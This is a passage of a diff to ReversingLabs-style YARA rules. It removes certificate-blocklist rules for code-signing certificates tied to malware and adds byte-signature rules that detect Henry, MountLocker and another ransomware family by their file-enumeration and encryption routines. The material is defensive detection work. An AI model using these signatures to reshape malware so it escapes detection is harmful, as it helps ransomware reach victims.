+            58 ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 49 ?? 8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50
+            ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F
+            84 ?? ?? ?? ?? 8B 4D ?? 8D 85 ?? ?? ?? ?? 8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50 ?? 3A
+        }
+		$find_files_p2 = {
+            51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84 ??
+            ?? ?? ?? 8B C7 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 8B D0 8D 85 ?? ?? ?? ?? 8D 70 ??
+            8D 64 24 ?? 8A 08 40 84 C9 75 ?? 8B 1D ?? ?? ?? ?? 2B C6 8D 94 10 ?? ?? ?? ?? 52 6A
+            ?? FF D3 50 FF 15 ?? ?? ?? ?? 8B F0 85 F6 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 56 FF
+            15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ??
+            ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 6A ?? 56 FF 15
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 56 FF 15 ?? ?? ?? ?? 85
+            C0 75 ?? 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 56 6A ??
+            FF D3 50 FF 15 ?? ?? ?? ?? 8B 75 ?? 8D 8D ?? ?? ?? ?? 51 56 FF 15 ?? ?? ?? ?? 85 C0
+            0F 85 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B 55 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15
+            ?? ?? ?? ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8D A5 ?? ?? ?? ?? 5F 5E
+            5B 8B E5 5D C3
+        }
+		$find_files_p3 = {
+            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 8B 7D ?? 85 FF 0F 84 ?? ?? ?? ?? 8B C7
+            8D 50 ?? 90 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 D1 F8 8D B4 00 ?? ?? ?? ?? 8D 86
+            ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 85 DB 0F 84 ?? ??
+            ?? ?? 56 57 53 FF 15 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8D 4C 24 ??
+            51 53 FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 75 ?? 8B 3D ?? ?? ?? ?? FF D7 83 F8 ??
+            0F 84 ?? ?? ?? ?? FF D7 E9 ?? ?? ?? ?? 8D A4 24 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84
+            24 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? F6 44 24 ?? ?? 0F 85 ?? ?? ?? ?? 8B
+            4D ?? 56 51 53 FF 15 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 56 8D 94 24
+            ?? ?? ?? ?? 52 53 FF 15 ?? ?? ?? ?? F6 44 24 ?? ?? 74 ?? E8 ?? ?? ?? ?? 85 C0 0F 85
+            ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0
+            74 ?? 66 83 38 ?? 74 ?? 68 ?? ?? ?? ?? 50 FF D7 85 C0 75 ?? FF 05 ?? ?? ?? ?? E9 ??
+            ?? ?? ?? 8D 7C 24 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 39 05 ?? ?? ?? ?? 0F 84
+            ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8D 4C 24 ?? 51 8D 54 24 ?? 52 FF D7 85 C0 74 ?? 8D 44
+        }
+		$find_files_p4 = {
+            24 ?? 50 8D 4C 24 ?? 51 6A ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 0F B7 44 24 ?? 8B 0D ??
+            ?? ?? ?? 3B C1 74 ?? 49 3B C1 74 ?? 8D 54 24 ?? 52 8D 44 24 ?? 50 FF D7 85 C0 74 ??
+            8D 4C 24 ?? 51 8D 54 24 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 0F B7 44 24 ?? 8B
+            0D ?? ?? ?? ?? 3B C1 74 ?? 49 3B C1 74 ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ??
+            ?? ?? ?? 8B 44 24 ?? 0B 44 24 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
+            A1 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 6A ?? 6A ?? 50 51 FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ??
+            80 3B ?? 75 ?? 80 7B ?? ?? 75 ?? 8B 15 ?? ?? ?? ?? 8D 3C 85 ?? ?? ?? ?? 8B 04 17 53
+            50 FF 15 ?? ?? ?? ?? EB ?? 8B 0D ?? ?? ?? ?? 8D 3C 85 ?? ?? ?? ?? 8B 14 0F 68 ?? ??
+            ?? ?? 52 FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 0C 07 68 ?? ?? ?? ?? 53 51 FF 15 ?? ??
+            ?? ?? 8B 15 ?? ?? ?? ?? 8B 04 17 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? 8B 54 24 ?? 8D 4C 24 ?? 51 52 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 44 24
+            ?? 50 FF 15 ?? ?? ?? ?? 53 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 5F 5E 33 C0
+            5B 8B E5 5D C2
+        }
+		$enum_network_resources = {
+            55 8B EC 8B 4D ?? 83 EC ?? 8D 45 ?? 50 51 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0
+            0F 85 ?? ?? ?? ?? 53 8B 1D ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 6A ?? C7 45 ?? ?? ?? ?? ??
+            FF D3 50 FF 15 ?? ?? ?? ?? 8B F0 89 75 ?? 85 F6 0F 84 ?? ?? ?? ?? 57 90 8B 4D ?? 8D
+            55 ?? 52 56 8D 45 ?? 50 51 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ??
+            ?? ?? 33 FF 39 7D ?? 76 ?? 83 C6 ?? 8D 64 24 ?? F6 46 ?? ?? 74 ?? F6 46 ?? ?? 74 ??
+            8B 06 8D 50 ?? 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 D1 F8 8D 94 00 ?? ?? ?? ?? 52
+            6A ?? FF D3 50 FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 04 8D ?? ?? ?? ?? 85 C0 74 ??
+            8B 16 0F B7 0A 66 89 08 83 C2 ?? 83 C0 ?? 66 85 C9 75 ?? FF 05 ?? ?? ?? ?? 8B 56 ??
+            83 E2 ?? 80 FA ?? 75 ?? 8D 46 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 47 83 C6 ?? 3B 7D ?? 72
+            ?? 8B 75 ?? E9 ?? ?? ?? ?? 56 6A ?? FF D3 50 FF 15 ?? ?? ?? ?? 5F 8B 4D ?? 51 FF 15
+            ?? ?? ?? ?? 5E 5B 8B E5 5D C3
+        }
+		$encrypt_files_p1 = {
+            55 8B EC 83 EC ?? 53 56 57 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
+            89 45 ?? 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? B8 ?? ?? ?? ?? 89 4D ?? E8 ?? ?? ??
+            ?? 8B F4 85 F6 0F 84 ?? ?? ?? ?? 8B D6 81 EA ?? ?? ?? ?? 83 C2 ?? 89 55 ?? 8B D6 81
+            EA ?? ?? ?? ?? 83 C2 ?? 89 55 ?? 8B D6 8B CE 8B FE 81 EA ?? ?? ?? ?? 33 C0 81 E9 ??
+            ?? ?? ?? 81 EF ?? ?? ?? ?? 83 C2 ?? C6 46 ?? ?? 89 55 ?? 8B 5D ?? 8A D0 80 E2 ?? 02
+            90 ?? ?? ?? ?? 32 90 ?? ?? ?? ?? 88 94 01 ?? ?? ?? ?? 8D 50 ?? 80 E2 ?? 02 90 ?? ??
+            ?? ?? 32 90 ?? ?? ?? ?? 88 94 07 ?? ?? ?? ?? 8D 50 ?? 80 E2 ?? 02 90 ?? ?? ?? ?? 32
+            90 ?? ?? ?? ?? 88 94 03 ?? ?? ?? ?? 8B 5D ?? 8D 50 ?? 80 E2 ?? 02 90 ?? ?? ?? ?? 32
+            90 ?? ?? ?? ?? 88 94 03 ?? ?? ?? ?? 8B 5D ?? 8D 50 ?? 80 E2 ?? 02 90 ?? ?? ?? ?? 32
+            90 ?? ?? ?? ?? 88 94 03 ?? ?? ?? ?? 8D 50 ?? 80 E2 ?? 02 90 ?? ?? ?? ?? 83 C0 ?? 32
+            90 ?? ?? ?? ?? 88 54 06 ?? 83 F8 ?? 0F 8C ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 4D ?? 50 51
+            FF 15 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ??
+            ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 55 ?? 52 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? C7 45
+            ?? ?? ?? ?? ?? FF D6 85 C0 75 ?? 8B 3D ?? ?? ?? ?? 8D 49 ?? 68 ?? ?? ?? ?? FF D7 8D
+            45 ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF D6 85 C0 74 ?? 50 FF 15 ?? ?? ??
+            ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B FC 85 FF 0F 84 ?? ?? ?? ?? 8B D7 81 EA ?? ?? ??
+            ?? 83 C2 ?? 89 55 ?? 8B D7 81 EA ?? ?? ?? ?? 83 C2 ?? 89 55 ?? 8B D7 8B CF 8B F7 81
+        }
+		$encrypt_files_p2 = {
+            EA ?? ?? ?? ?? 33 C0 81 E9 ?? ?? ?? ?? 81 EE ?? ?? ?? ?? 83 C2 ?? C6 47 ?? ?? 89 55
+            ?? 8B 5D ?? 8A D0 80 E2 ?? 02 90 ?? ?? ?? ?? 32 90 ?? ?? ?? ?? 88 94 08 ?? ?? ?? ??
+            8D 50 ?? 80 E2 ?? 02 90 ?? ?? ?? ?? 32 90 ?? ?? ?? ?? 88 94 30 ?? ?? ?? ?? 8D 50 ??
+            80 E2 ?? 02 90 ?? ?? ?? ?? 32 90 ?? ?? ?? ?? 88 94 18 ?? ?? ?? ?? 8B 5D ?? 8D 50 ??
+            80 E2 ?? 02 90 ?? ?? ?? ?? 32 90 ?? ?? ?? ?? 88 94 18 ?? ?? ?? ?? 8B 5D ?? 8D 50 ??
+            80 E2 ?? 02 90 ?? ?? ?? ?? 32 90 ?? ?? ?? ?? 88 94 18 ?? ?? ?? ?? 8D 50 ?? 80 E2 ??
+            02 90 ?? ?? ?? ?? 83 C0 ?? 32 90 ?? ?? ?? ?? 88 54 07 ?? 83 F8 ?? 0F 8C ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8B D8 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B C8 2B 4D ??
+            B8 ?? ?? ?? ?? F7 E1 8B CA C1 E9 ?? B8 ?? ?? ?? ?? F7 E1 C1 EA ?? 8B C2 C1 E0 ?? 2B
+            C2 03 C0 03 C0 2B C8 8B F2 B8 ?? ?? ?? ?? F7 E6 A1 ?? ?? ?? ?? 51 C1 EA ?? 8B CA C1
+            E1 ?? 2B CA 03 C9 03 C9 2B F1 56 52 8B 15 ?? ?? ?? ?? 52 50 53 57 E8 ?? ?? ?? ?? 83
+            C4 ?? 85 DB 0F 84 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8B D8 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B C8 2B
+            4D ?? B8 ?? ?? ?? ?? F7 E1 8B CA C1 E9 ?? B8 ?? ?? ?? ?? F7 E1 C1 EA ?? 8B C2 C1 E0
+            ?? 2B C2 03 C0 03 C0 2B C8 8B F2 B8 ?? ?? ?? ?? F7 E6 A1 ?? ?? ?? ?? 51 C1 EA ?? 8B
+            CA C1 E1 ?? 2B CA 03 C9 03 C9 2B F1 56 52 8B 15 ?? ?? ?? ?? 52 50 53 57 E8 ?? ?? ??
+            ?? 83 C4 ?? 85 DB 0F 85 ?? ?? ?? ?? 8D 65 ?? 5F 5E 5B 8B E5 5D C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TOLGA KAPLAN" and pe.signatures [ i ] . serial == "01:66:b6:50:38:d6:1e:54:35:b4:82:04:ca:e4:79:5a" and 1403999999 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $enum_network_resources ) and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_784F226B45C3Bd8E4089243D747D1F59 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Henry : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Henry ransomware."
 		author = "ReversingLabs"
-		id = "f2a979e0-2027-5143-8cb4-ffcfd19faf45"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "63627f2b-3205-5790-ba97-8e0d1da39d7c"
+		date = "2021-06-14"
+		modified = "2021-06-14"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2578-L2594"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Henry.yara#L1-L80"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "df8ca35a07ec6815d1efb68fa6fbf8f80c57032ecb99d0b038da0604ceffe8cf"
+		logic_hash = "e6ab2a8a344d40407118e29ff78f5a0144f42a0fbdee19a80b341b59f056d292"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Henry"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FSPro Labs" and pe.signatures [ i ] . serial == "78:4f:22:6b:45:c3:bd:8e:40:89:24:3d:74:7d:1f:59" and 1242777599 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_11690F05604445Fae0De539Eeeeec584 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "e6513bd1-2524-5baa-8484-b7e0f2f0c02a"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2596-L2612"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "b66257f562f698559910eb9576f8fdf0ce3a750cc0a96a27e2ec1a18872ad13f"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$find_files = {
+            02 6F ?? ?? ?? ?? 0A 16 0B 2B ?? 06 07 9A 0C 08 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ??
+            ?? ?? DE ?? 26 DE ?? 07 17 58 0B 07 06 8E 69 32 ?? 02 6F ?? ?? ?? ?? 0D 16 0B 38 ?? ??
+            ?? ?? 09 07 9A 13 ?? 11 ?? 6F ?? ?? ?? ?? 19 17 73 ?? ?? ?? ?? 25 6F ?? ?? ?? ?? D4 8D
+            ?? ?? ?? ?? 13 ?? 25 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 26 6F ?? ?? ?? ?? 11 ?? 6F ??
+            ?? ?? ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ??
+            28 ?? ?? ?? ?? 18 18 73 ?? ?? ?? ?? 25 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 6F ?? ?? ??
+            ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 26 DE ?? 07 17 58 0B 07 09 8E 69 3F ?? ??
+            ?? ?? 2A
+        }
+		$encrypt_files = {
+            02 8E 2D ?? 72 ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 03 28 ?? ?? ?? ?? 2C ?? 72 ?? ?? ?? ?? 73
+            ?? ?? ?? ?? 7A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 28 ??
+            ?? ?? ?? 0D 73 ?? ?? ?? ?? 13 ?? 03 08 73 ?? ?? ?? ?? 13 ?? 09 11 ?? 1F ?? 6F ?? ?? ??
+            ?? 07 6F ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 17 73 ?? ?? ?? ?? 25 02 16 02 8E 69 6F ?? ?? ??
+            ?? 25 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 0A 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ??
+            25 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 FE ?? 09 6F ?? ?? ?? ?? DC 06 2A
+        }
+		$setup_environment = {
+            02 28 ?? ?? ?? ?? 1B 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 73
+            ?? ?? ?? ?? 28 ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 1F ?? 28
+            ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ??
+            ?? ?? 02 28 ?? ?? ?? ?? 2A
+        }
+		$init_components = {
+            02 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 02
+            7B ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 22 ?? ?? ?? ?? 16 19
+            20 ?? ?? ?? ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 20 ?? ?? ?? ?? 1F ?? 73
+            ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ??
+            ?? ?? 20 ?? ?? ?? ?? 1F ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 16 6F ?? ??
+            ?? ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 17 6F ?? ?? ??
+            ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 22 ?? ?? ?? ?? 16 19 20 ?? ?? ?? ?? 73 ?? ?? ?? ??
+            6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 20 ?? ?? ?? ?? 1F ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02
+            7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 20 ?? ?? ?? ?? 20 ?? ??
+            ?? ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 02 7B ?? ?? ??
+            ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 22 ?? ?? ?? ?? 22 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 02 17 28 ?? ?? ?? ?? 02 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ??
+            ?? ?? 02 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 02 7B ?? ??
+            ?? ?? 6F ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ??
+            02 02 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 16 28 ?? ?? ?? ?? 02 28 ?? ??
+            ?? ?? 2A
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Tera information Technology co.Ltd" and pe.signatures [ i ] . serial == "11:69:0f:05:60:44:45:fa:e0:de:53:9e:ee:ee:c5:84" and 1294703999 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( $setup_environment ) and ( $init_components )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_Aa146Bff4B832Bdbfe30B84580356763 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Mountlocker : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects MountLocker ransomware."
 		author = "ReversingLabs"
-		id = "90fab567-f39f-5d0b-b0d9-a93693a05a01"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "8ce7e5c4-9eca-5dd2-ab92-39b915900d72"
+		date = "2021-03-25"
+		modified = "2021-03-25"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2614-L2632"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.MountLocker.yara#L1-L86"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "37abe7a4fd773fd34f5d7dbe725ba4edcfb8ebb501dc41f386b8b0629161051f"
+		logic_hash = "d203217c229d54802e96e19dc66d38ecb0443d19e0492efe337df471a99559dc"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "MountLocker"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yancheng Peoples Information Technology Service Co., Ltd" and ( pe.signatures [ i ] . serial == "00:aa:14:6b:ff:4b:83:2b:db:fe:30:b8:45:80:35:67:63" or pe.signatures [ i ] . serial == "aa:14:6b:ff:4b:83:2b:db:fe:30:b8:45:80:35:67:63" ) and 1295481599 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_E86F46B60142092Aae81B8F6Fa3D9C7C : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "fde17cc1-a968-5134-b12b-d65cb34c086f"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2634-L2652"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "6de16a44bc84fbf8f1d3d82526e1d7f8fd4ae3da6deaa471c77d2c8df47a14b0"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$encrypt_files_p1 = {
+            55 8B EC 83 E4 ?? 83 EC ?? 53 56 57 8B 3D ?? ?? ?? ?? 8B DA 8B F1 FF D7 89 44 24 ??
+            33 C0 50 68 ?? ?? ?? ?? 6A ?? 50 50 68 ?? ?? ?? ?? 56 89 54 24 ?? 89 44 24 ?? FF 15
+            ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8D 4C 24 ?? 51 50 FF 15 ?? ?? ??
+            ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? FF 74 24 ?? FF 74 24 ?? 6A ?? 6A ?? FF 74 24 ?? FF
+            15 ?? ?? ?? ?? 89 44 24 ?? 85 C0 0F 84 ?? ?? ?? ?? 33 C9 0F 31 89 44 8C ?? 41 83 F9
+            ?? 72 ?? FF 75 ?? 8B D3 8D 4C 24 ?? E8 ?? ?? ?? ?? 89 44 24 ?? 59 85 C0 74 ?? 8D 4C
+            24 ?? E8 ?? ?? ?? ?? 89 44 24 ?? 8B 7C 24 ?? 8B 44 24 ?? 89 7C 24 ?? 89 44 24 ?? 8B
+            35 ?? ?? ?? ?? 8B DE 8B 15 ?? ?? ?? ?? 03 DF 8B CA 89 54 24 ?? 13 C8 BF ?? ?? ?? ??
+            8B C6 F0 0F C7 0F 8B 7C 24 ?? 3B C6 8B 44 24 ?? 75 ?? 3B 54 24 ?? 75 ?? FF 74 24 ??
+            8B 35 ?? ?? ?? ?? FF D6 FF 74 24 ?? FF D6 8B 3D ?? ?? ?? ?? FF D7 8B F8 8B C2 2B 7C
+            24 ?? 89 7C 24 ?? 1B 44 24 ?? 89 44 24 ?? 75 ?? 85 FF 0F 84 ?? ?? ?? ?? 8B 35 ?? ??
+            ?? ?? 8B DE 8B 15 ?? ?? ?? ?? 03 DF 8B CA 89 54 24 ?? 13 C8 BF ?? ?? ?? ?? 8B C6 F0
+            0F C7 0F 8B 7C 24 ?? 3B C6 8B 44 24 ?? 75 ?? 3B 54 24 ?? 75 ?? 50 57 FF 74 24 ?? FF
+            74 24 ?? E8 ?? ?? ?? ?? 89 44 24 ?? 8B C2 81 E2 ?? ?? ?? ?? 25 ?? ?? ?? ?? 89 54 24
+            ?? DF 6C 24 ?? 83 64 24 ?? ?? 89 44 24 ?? DF 6C 24 ?? D9 E0 DE C1 D9 5C 24 ?? D9 44
+            24 ?? D9 05 ?? ?? ?? ?? D8 D9 DF E0 F6 C4 ?? 7A ?? D9 1D ?? ?? ?? ?? EB ?? DD D8 8B
+            44 24 ?? EB ?? 8B 44 24 ?? 85 C0 8B 35 ?? ?? ?? ?? 74 ?? 50 FF D6 FF 74 24 ?? FF D6
+            33 C0 5F 5E 5B 8B E5 5D C3
+        }
+		$encrypt_files_p2 = {
+            55 8B EC 83 EC ?? 53 56 57 33 FF 6A ?? 8B F7 5B 0F 31 6A ?? 89 86 ?? ?? ?? ?? FF 15
+            ?? ?? ?? ?? 83 C6 ?? 3B F3 72 ?? 8B D3 B9 ?? ?? ?? ?? 8A 01 88 41 ?? 41 83 EA ?? 75
+            ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 57 8D 45 ?? 89 5D ?? 50 89 7D ?? 89 7D ?? FF
+            15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 57 57 68 ?? ?? ?? ?? 68 ?? ?? ??
